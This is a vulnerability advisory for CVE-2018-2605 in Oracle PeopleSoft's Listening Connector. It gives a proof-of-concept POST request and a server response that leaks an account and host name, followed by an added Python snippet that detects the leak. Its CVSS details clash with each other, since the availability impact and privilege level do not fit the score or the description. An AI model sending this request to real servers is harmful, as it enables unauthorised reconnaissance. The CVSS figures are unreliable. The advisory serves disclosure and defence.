ERPScan advisory ERPSCAN-18-001
Jun 15, 2017 - 12:00 a.m.

Information Disclosure in PeopleSoft Listening Connector

Source: erpscan.io
EPSS: 0.001 (Low), percentile 46.9%

Application: Oracle PeopleSoft
Versions Affected: Oracle PeopleTools 8.54 – 8.56
Vendor: Oracle
Bugs: Information Disclosure
Reported: 15.06.2017
Vendor response: 16.06.2017
Date of Public Advisory: 17.01.2018
Reference: Oracle CPU January 2018
Authors: Dmitri Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: Information Disclosure
Risk: Medium
Impact: Sensitive data may be exposed to attackers
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-2605

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) Low (L)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality High (H)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

VULNERABILITY DESCRIPTION

A remote unauthenticated attacker can obtain a PIA user and the FQDN of the PeopleSoft server via a trivial POST request.

VULNERABLE PACKAGES

Oracle PeopleTools: 8.54
Oracle PeopleTools: 8.55
Oracle PeopleTools: 8.56

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement the Oracle CPU January 2018.

TECHNICAL DESCRIPTION

Proof of Concept

```
POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector
Content-Type: application/json

-- response --
200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Length: 675
Content-Type: text/plain; charset=UTF-8
Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE
Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)
Mime-Version: 1.0
Content-Type: multipart/related;
 boundary="----=_Part_95_86951755.1497612847564"
Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message
------=_Part_95_86951755.1497612847564
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
Content-ID: IBInfo
<?xml version="1.0"?>2015810408Integration Gateway Error
------=_Part_95_86951755.1497612847564--
```
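To check a response saved from your own Integration Gateway for the same leak, the added example below (not part of the ERPScan advisory) extracts what a JavaMail-style Message-ID exposes. The field layout is an assumption inferred from the sample response above, and `find_disclosure` and the `CLEAN_RESPONSE` sample are hypothetical names constructed for illustration.

```python
import re
from datetime import datetime, timedelta, timezone

# Field layout inferred from the Message-ID in the advisory's sample response
# (an assumption): <number>.<epoch milliseconds>.JavaMail.<account>@<host>
JAVAMAIL_ID = re.compile(
    r"^Message-ID:\s*<?\d+\.(\d{13})\.JavaMail\.([^@\s<>]+)@([^\s<>]+)",
    re.IGNORECASE | re.MULTILINE,
)
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def find_disclosure(response_text):
    """Return what a JavaMail-style Message-ID exposes, or None if absent."""
    match = JAVAMAIL_ID.search(response_text)
    if match is None:
        return None
    millis, account, host = match.groups()
    # Integer arithmetic keeps the millisecond value exact.
    generated = EPOCH + timedelta(milliseconds=int(millis))
    return {
        "account": account,
        "host": host,
        "generated_utc": generated.isoformat(),
    }


# Headers copied from the response shown in the advisory.
ADVISORY_RESPONSE = """200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Length: 675
Content-Type: text/plain; charset=UTF-8
Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin
Mime-Version: 1.0
"""

# Constructed sample: a response with no Message-ID line.
CLEAN_RESPONSE = """200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Type: text/plain; charset=UTF-8
"""

if __name__ == "__main__":
    for name, text in (("advisory", ADVISORY_RESPONSE), ("clean", CLEAN_RESPONSE)):
        print(name, find_disclosure(text))
```

The decoded timestamp matches the `Date` header of the sample response, so the Message-ID also exposes the server's clock alongside the account and host name.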
